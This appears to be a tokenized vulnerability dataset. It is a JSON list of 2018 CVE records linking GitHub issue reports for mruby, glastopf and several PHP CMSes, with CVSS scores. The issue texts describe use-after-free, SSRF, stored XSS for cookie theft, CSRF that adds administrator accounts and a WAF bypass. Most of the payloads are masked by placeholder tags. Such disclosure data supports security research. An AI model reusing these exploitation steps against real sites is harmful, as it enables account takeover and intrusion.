        "description": "Use after free caused by integer overflow in environment stack. URLTAG reported the following: Root Cause: =========== Nesting many scopes as seen in the input leads to an integer overflow in OP_GET_UPVAR: CODETAG Details: ======== If NUMBERTAG scopes are nested and we access a variable from the outermost scope from the innermost scope, c overflows to NUMBERTAG b contains the index of of the variable in the outer scope, but is used to offset into the inner scopes stackframe. If the outermost scope contains many variables, b can become large. If b is large, and the innermost stackframe is small, we can use memory from outside the stackframe as mrb_value. In some cases, a mrb_value can contains a pointer (objects, strings etc). In these cases, the pointer can be corrupted by controlling the memory outside the stack frame. Our POC triggers a use after free access (see APITAG In other cases, we can simply change variables from other stackframes, we observed some type confusions in various C functions that seem to dislike values changing magically (see the attached input nullptr_deref.rb, where a corrupted proc object is used in places where an object is expected). Bugfix: ======= Ensure that deep nesting is an error condition (As this will cause bugs in ruby programs, even if the underlaying C code is fixed). Additionally add the following check (taken from SET_UPVAR, where the size is checked correctly) APITAG Steps to Reproduce: ================== setup latest mruby CODETAG run inputs: ERRORTAG and also: ERRORTAG Authors: ======== Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, Tigist Abera Impact By leveraging the use after free, an attacker is most likely able to obtain arbitrary code execution. APITAG : CODETAG APITAG : CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10199",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4001",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4001",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2018-04-16T15:50:03Z",
        "description": "Use after free in File initilialize_copy. The following was reported by URLTAG Root Cause: ========== calling APITAG with an invalid argument, causes the function to terminate early, leaving a dangling pointer in the recievers APITAG . ERRORTAG Details & Impact ======= initialize_copy first frees the APITAG , then it gets the data pointer for the first argument. This operation can raise an exception, in which case APITAG remains dangeling. By proper heap feng shui, one can allocate another value (such as string) in the same spot. Calling APITAG will set APITAG , effectively setting some memory to APITAG . This can be used to change the size of a string object. The corrupted string can then be used to read/write memory. This can be used to obtain arbitrary code execution. CODETAG Bugfix ====== Move APITAG to the top of the function (next to APITAG ). Steps to Reproduce ================== obtain current mruby version CODETAG run testcase ERRORTAG Authors: Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, Tigist Abera",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10220",
        "Issue_Url_old": "https://github.com/mushorg/glastopf/issues/286",
        "Issue_Url_new": "https://github.com/mushorg/glastopf/issues/286",
        "Repo_new": "mushorg/glastopf",
        "Issue_Created_At": "2018-04-16T07:28:39Z",
        "description": "there is a vulnerability of Server Side Request Forgery. My English isn't fluent when I let this program run in my nginx web site, I find it has Server Side Request Forgery vulnerability for example , the url is APITAG and I can get the log from the other web server which this APITAG it. I know you have do something that prevent it, though I can see ERRORTAG from this request APITAG Maybe the other hackers could use it to attack the other website as a proxy My English really is not fluent I hope you can understand my means, thanks, bro.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10221",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/129",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/129",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-18T08:50:37Z",
        "description": "There is a persistent XSS vulnerability that can steal the cookies of the administrator . After the website editor(whose privilege is lower than the administrator) logged in,he can add a new TAGS with the XSS payload. exploit the vulnerability\uff0ca website editor can steal the cookies when the administrator browse the TAGS Management and activate the XSS code . The vulnerability APITAG distribution >TAGS management >ADD TAGS FILETAG Inject the XSS payload: APITAG alert(/xss/) APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10222",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/21",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/21",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-04-18T04:39:00Z",
        "description": "CSRF exists in the idreamsoft iCMS NUMBERTAG Column Management add. CSRF exists in the idreamsoft iCMS NUMBERTAG Column Management add and can be add Column Management by constructing paylod\u3002 Paylod: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10223",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/1",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/1",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2018-04-19T02:40:25Z",
        "description": "There is two CSRF vulnerability that can add the administrator account. There is two CSRF vulnerability that can add the administrator account After the administrator logged in,open the following one page. POC: URLTAG FILETAG For example: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2018-10224",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/2",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/2",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2018-04-19T02:41:09Z",
        "description": "There is two CSRF vulnerability that can add the Tag. There is two CSRF vulnerability that can add the Tag account After the administrator logged in,open the following one page. POC: URLTAG FILETAG For example: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2018-10227",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/15",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/15",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-04-18T03:28:13Z",
        "description": "There is a xss vulnerability XSS vulnerability can attack users to execute commands. There is a storage XSS vulnerability at the location of the web site at the page setup site, which can be executed by constructing POC. poc: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG APITAG FILETAG APITAG exp at the site_link parameter FILETAG APITAG through IE, run active FILETAG APITAG up the CMD command FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10248",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/130",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/130",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-20T13:57:13Z",
        "description": "There is one CSRF vulnerability that can Delete any article. After the administrator logged in, open the following page poc\uff1a APITAG Delete any article APITAG APITAG APITAG APITAG APITAG APITAG Id and cid parameters can be seen in the foreground like this URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10250",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/22",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/22",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-04-20T08:52:50Z",
        "description": "iCMS NUMBERTAG SS. Log in first \uff08 FILETAG \uff09 All search boxes exist in XSS, payload \uff1a \"/> APITAG confirm NUMBERTAG APITAG APITAG > classified management > keyword search WAF detects alert, confirm bypasses the waf payload: APITAG APITAG GET PATHTAG NUMBERTAG APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG iCMS_tag_category_tabs=tree; APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG APITAG APITAG APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10266",
        "Issue_Url_old": "https://github.com/source-trace/beescms/issues/1",
        "Issue_Url_new": "https://github.com/source-trace/beescms/issues/1",
        "Repo_new": "source-trace/beescms",
        "Issue_Created_At": "2018-04-19T12:14:03Z",
        "description": "There is two CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following one page poc\uff1a CODETAG FILETAG FILETAG URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10267",
        "Issue_Url_old": "https://github.com/taosir/wtcms/issues/1",
        "Issue_Url_new": "https://github.com/taosir/wtcms/issues/1",
        "Repo_new": "taosir/wtcms",
        "Issue_Created_At": "2018-04-21T07:29:01Z",
        "description": "Has a CSRF vulnerability and can add an administrator account. After the administrator logs in, open the CSRF exp page. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10295",
        "Issue_Url_old": "https://github.com/chemcms/ChemCMS/issues/1",
        "Issue_Url_new": "https://github.com/chemcms/chemcms/issues/1",
        "Repo_new": "chemcms/chemcms",
        "Issue_Created_At": "2018-04-22T09:40:24Z",
        "description": "CSRF vulnerability can add the administrator account. The administrator needs to login to the background and open the following page. poc: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10296",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/17",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/17",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-04-22T04:14:14Z",
        "description": "This is a stored XSS vulnerability that we can easily get their cookie. This is a stored XSS vulnerability first\uff0cwe shoud land \uff08 URLTAG \uff09 writing articles and published an article payload APITAG APITAG i think you can see the following picture to konw more. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6 Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG when we published the article and we can see it from homepage. FILETAG If people read our articles, we can easily get their cookie. src= FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10311",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/131",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/131",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-23T07:59:48Z",
        "description": "There is a cross site scripting vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When visiting again APITAG xss code execution poc: FILETAG CODETAG APITAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10312",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/132",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/132",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-23T10:42:36Z",
        "description": "There is one CSRF vulnerability that can Change the common member's password. The vulnerability occurs in APITAG This is the interface of a common member to reset the password FILETAG The interface does not have CSRF protection, which causes ordinary members to change the login password without knowing their members when they open the Poc page. poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10313",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/133",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/133",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-23T14:32:02Z",
        "description": "There is a cross site scripting vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When the background administrator inquires about the personal information of this ordinary member, XSS triggers successfully. poc: vulnerability trigger point FILETAG CODETAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10318",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/6",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/6",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-04-23T12:25:52Z",
        "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. pages APITAG Page APITAG payload: \"/> APITAG confirm NUMBERTAG APITAG i think you can see the following picture to konw more. FILETAG FILETAG POC: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG when we published the article and we can see it from homepage. URL\uff1a URLTAG FILETAG FILETAG Anyone who visit the target page will be affected to triage APITAG code, including administrator, editor, developer, and guest. If people read our articles, we can easily get their cookie. APITAG APITAG Affected Version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10319",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/7",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/7",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-04-23T12:48:47Z",
        "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. snippet APITAG snippet APITAG payload\uff1a APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG save it. i think you can see the following picture to konw more. exp: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG expanded_rows NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG FILETAG FILETAG FILETAG Affected Version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10320",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/8",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/8",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-04-23T13:00:17Z",
        "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. layouts APITAG layout APITAG payload\uff1a APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG save it. i think you can see the following picture to konw more. exp POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG expanded_rows NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG FILETAG FILETAG FILETAG payload\uff1a APITAG APITAG APITAG APITAG Affected Version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10321",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/5",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/5",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-04-23T10:40:30Z",
        "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. Hi, I have found a stored Cross Site Scripting Vulnerability. Steps to replicate NUMBERTAG log into the system as an administrator role NUMBERTAG enter page: URLTAG and click Settings option NUMBERTAG navigate to APITAG Site title\" section NUMBERTAG enter payload as shown in below section: ERRORTAG NUMBERTAG isit URLTAG you will triage APITAG execution Impacts: Anyone who visit the target page will be affected to triage APITAG code, including administrator, editor, developer, and guest. Affected Version NUMBERTAG Affected URL: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10329",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/1903",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/1903",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2018-04-23T07:34:27Z",
        "description": "Reflected xss on phpipam NUMBERTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10362",
        "Issue_Url_old": "https://github.com/phpLiteAdmin/pla/issues/11",
        "Issue_Url_new": "https://github.com/phpliteadmin/pla/issues/11",
        "Repo_new": "phpliteadmin/pla",
        "Issue_Created_At": "2018-04-23T04:31:51Z",
        "description": "Authorization bypass in FILETAG . The APITAG function of the Authorization class uses '==' comparison instead of '===' comparison. This can lead to a problem if the password is a number written in scientific notation. E.g.: php > var_dump NUMBERTAG e2'); bool(true) php > var_dump NUMBERTAG e NUMBERTAG You should use === even if this is just a problem with a small impact.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10364",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/332",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/332",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-03-31T00:24:34Z",
        "description": "Cross Site Script. XSS in user management page may lead to privilege escalation. Reproduction NUMBERTAG Log in as a normal user with little privilege NUMBERTAG Modify current user's profile. Insert malicious code into either name field or company field. APITAG of them are vulnerable NUMBERTAG Wait until administrator visit the user management page. APITAG APITAG BTW, may I be rewarded with a CVE id? Appreciate it in advance.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10367",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/135",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/135",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-24T13:05:10Z",
        "description": "Two Stored XSS Vulnerability. Two Stored XSS when post an article Steps to Reproduce APITAG the backstage URLTAG NUMBERTAG Go to content management, choose an existing one or post a new on to edit FILETAG APITAG are two Stored XSS, a)the first one lie in the title section b)the secone lie the the content section(you need to change to source code mode) FILETAG APITAG and we can see the page we just edit, the title is too obvious FILETAG APITAG a)title section FILETAG b)content section FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10368",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/136",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/136",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-24T13:39:09Z",
        "description": "Stored XSS Vulnerability. Stored XSS Vulnerability Found in Extension module > System Announcement Steps to Reproduce APITAG the backstage URLTAG NUMBERTAG Go to Extension Module > System Announcement > Post an new one FILETAG NUMBERTAG set to the source code mode, add the following payload to content section APITAG FILETAG APITAG and see the announcement we just posted FILETAG FILETAG Stored XSS triggered ...",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10374",
        "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/1",
        "Issue_Url_new": "https://github.com/teameasy/easycms/issues/1",
        "Repo_new": "teameasy/easycms",
        "Issue_Created_At": "2018-04-24T14:35:55Z",
        "description": "Easycms has a Reflexive Cross Site Scripting Vulnerability. Download and install, on the front page, \uff08 FILETAG \uff09 All search boxes exist in XSS, payload \uff1a \"/> APITAG confirm NUMBERTAG APITAG exp: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: dwz_theme=default; UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG think_template=default; APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6 Connection: keep alive Upgrade Insecure Requests NUMBERTAG s=\"/> APITAG confirm NUMBERTAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10375",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/1",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/1",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2018-04-24T03:07:39Z",
        "description": "File uploading vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell.. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10391",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/134",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/134",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-24T07:26:21Z",
